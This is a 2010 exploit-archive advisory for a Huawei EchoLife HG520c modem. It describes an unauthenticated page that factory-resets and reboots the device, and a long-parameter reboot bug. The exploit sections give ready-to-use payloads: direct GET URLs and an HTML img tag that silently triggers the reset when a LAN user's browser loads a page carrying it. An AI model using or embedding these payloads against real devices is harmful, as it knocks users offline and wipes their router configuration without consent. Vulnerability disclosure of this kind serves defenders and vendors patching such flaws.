Huawei EchoLife HG520c Denial of Service and Modem Reset

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Huawei EchoLife HG520c Denial of Service and Modem Reset
# Published : 2010-04-19
# Author : hkm
# Previous Title : AVTECH Software (AVC781Viewer.dll) ActiveX Multiple Remote Vulnerabilities
# Next Title : Windows 7/2008R2 SMB Client Trans2 Stack Overflow 10-020 PoC

# Exploit Title: Huawei EchoLife HG520c Denial of Service and Modem Reset
# Date: 2010-04-19
# Author: hkm
# Product Link: http://www.huawei.com/mobileweb/en/products/view.do?id=660
# Firmware Versions: 3.10.18.7-1.0.7.0
#                    3.10.18.5-1.0.7.0
#                    3.10.18.4
# Software Versions: V100R001B120Telmex
#                    V100R001B121Telmex


[Description #1]
=================
The page '/AutoRestart.html' restores the default configuration and reboots
the device. This page does not require authentication.

[Exploit #1]
=================
From LAN or Client Side, just send a simple GET request to:

  http://192.168.1.254/AutoRestart.html

  <img src=http://192.168.1.254/AutoRestart.html>

In case of having the remote interface enabled, from remote:

  http://<REMOTE IP>/AutoRestart.html
______________________________________________________________________


[Description #2]
=================
The page '/rpLocalDeviceJump.html' reboots the device when the 'index'
variable value has a length of more than 7 characters. Requires
authentication.

[Exploit #2]
=================

  http://192.168.1.254/rpLocalDeviceJump.html?index=HAKIM.WS
_____________________________________________________________________


Greets: Requiz, LightOS, chr1x, sdc, nitr0us, pcp, Xianur0, Chito, Kike,
House, Aldo, Chewi, Alex, Paco.


  hkm

hkm@hakim.ws


 [ Comunidad Underground de Mexico - http://www.underground.org.mx ]